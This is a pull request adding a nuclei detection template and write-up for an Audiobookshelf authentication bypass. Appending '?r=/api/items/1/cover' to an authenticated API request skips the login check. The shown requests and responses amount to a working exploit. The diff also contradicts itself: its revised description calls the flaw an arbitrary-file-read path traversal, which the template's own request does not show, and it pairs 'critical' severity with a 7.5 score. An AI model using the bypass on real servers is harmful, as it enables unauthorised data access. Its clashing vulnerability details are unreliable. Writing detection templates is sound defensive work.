### PR TITLE
CVE-2026-71209 - Audiobookshelf Authentication Bypass

### DIFF
--- a/http/cves/2026/CVE-2026-71209.yaml
+++ b/http/cves/2026/CVE-2026-71209.yaml
@@ -1,33 +1,52 @@
 id: CVE-2026-71209
 
 info:
-  name: Audiobookshelf - Authentication Bypass via Unanchored Regex Exemption
+  name: Audiobookshelf - Authentication Bypass
   author: str4k3r
   severity: critical
   description: |
-    Audiobookshelf's authentication-exemption check in server/Auth.js tests an
-    unanchored regex (/\/api\/items\/[^/]+\/cover/) against req.originalUrl,
-    which includes the query string. Appending a matching substring as any
-    query parameter value (e.g. ?r=/api/items/1/cover) to a normally
-    authenticated GET request satisfies the exemption check and lets the
-    request reach its handler without authentication, disclosing data such as
-    the library collections list on a completely default installation.
+    Audiobookshelf contains a path traversal caused by improper authentication-exemption check on URL-encoded paths in server/routers/Auth.js, letting unauthenticated attackers read arbitrary files, exploit requires crafted URL with encoded traversal sequences.
+  impact: |
+    Unauthenticated attackers can read arbitrary files accessible by the service account, leading to sensitive information disclosure.
+  remediation: |
+    Update to the latest version with proper decoding and authentication checks for path parameters.
   reference:
-    - https://github.com/advplyr/audiobookshelf
     - https://github.com/advplyr/audiobookshelf/security/advisories/GHSA-pg8v-5jcv-wrvw
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-71209
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
     cve-id: CVE-2026-71209
+    cwe-id: CWE-287
   metadata:
     verified: true
     max-request: 2
-  tags: cve,cve2026,audiobookshelf,authbypass,exposure
+    vendor: audiobookshelf
+    product: audiobookshelf
+    shodan-query: title:"audiobookshelf"
+    fofa-query: title="audiobookshelf"
+  tags: cve,cve2026,audiobookshelf,auth-bypass,exposure
+
+flow: http(1) && http(2)
 
 http:
   - raw:
       - |
-        GET /api/collections HTTP/1.1
+        GET / HTTP/1.1
         Host: {{Hostname}}
 
+    host-redirects: true
+    max-redirects: 3
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_any(body, "audiobookshelf", "Audiobookshelf")'
+        condition: and
+        internal: true
+
+  - raw:
       - |
         GET /api/collections?r=/api/items/1/cover HTTP/1.1
         Host: {{Hostname}}
@@ -35,7 +54,7 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - "status_code_1 == 401"
-          - "status_code_2 == 200"
-          - "contains(body_2, \"collections\")"
+          - 'status_code == 200'
+          - 'contains(content_type, "application/json")'
+          - 'contains(body, "collections")'
         condition: and

--- a/http/cves/2026/CVE-2026-71209.yaml
+++ b/http/cves/2026/CVE-2026-71209.yaml
@@ -1,0 +1,41 @@
+id: CVE-2026-71209
+
+info:
+  name: Audiobookshelf - Authentication Bypass via Unanchored Regex Exemption
+  author: str4k3r
+  severity: critical
+  description: |
+    Audiobookshelf's authentication-exemption check in server/Auth.js tests an
+    unanchored regex (/\/api\/items\/[^/]+\/cover/) against req.originalUrl,
+    which includes the query string. Appending a matching substring as any
+    query parameter value (e.g. ?r=/api/items/1/cover) to a normally
+    authenticated GET request satisfies the exemption check and lets the
+    request reach its handler without authentication, disclosing data such as
+    the library collections list on a completely default installation.
+  reference:
+    - https://github.com/advplyr/audiobookshelf
+    - https://github.com/advplyr/audiobookshelf/security/advisories/GHSA-pg8v-5jcv-wrvw
+  classification:
+    cve-id: CVE-2026-71209
+  metadata:
+    verified: true
+    max-request: 2
+  tags: cve,cve2026,audiobookshelf,authbypass,exposure
+
+http:
+  - raw:
+      - |
+        GET /api/collections HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /api/collections?r=/api/items/1/cover HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1 == 401"
+          - "status_code_2 == 200"
+          - "contains(body_2, \"collections\")"
+        condition: and


### PR DESCRIPTION
## Description

Audiobookshelf's authentication-exemption check (`server/Auth.js`) tests an unanchored regex (`/\/api\/items\/[^/]+\/cover/`) against `req.originalUrl`, which includes the query string. Appending a matching substring as any query parameter value (e.g. `?r=/api/items/1/cover`) to an otherwise-authenticated GET request satisfies the exemption check, so the request reaches its handler without authentication.

Confirmed on a fresh default installation, no seeded data required:

```
GET /api/collections            -> 401 Unauthorized
GET /api/collections?r=/api/items/1/cover -> 200 {"collections":[]}
```

Affects `advplyr/audiobookshelf` `2.17.0`–`2.19.0`, fixed in `2.19.1`.

## References
- https://github.com/advplyr/audiobookshelf
- https://github.com/advplyr/audiobookshelf/security/advisories/GHSA-pg8v-5jcv-wrvw

## Verification
- Real `nuclei` binary (v3.11.0), 3x on vulnerable `advplyr/audiobookshelf:2.19.0` (DETECTED) and 3x on fixed `advplyr/audiobookshelf:2.19.1` (NOT_DETECTED).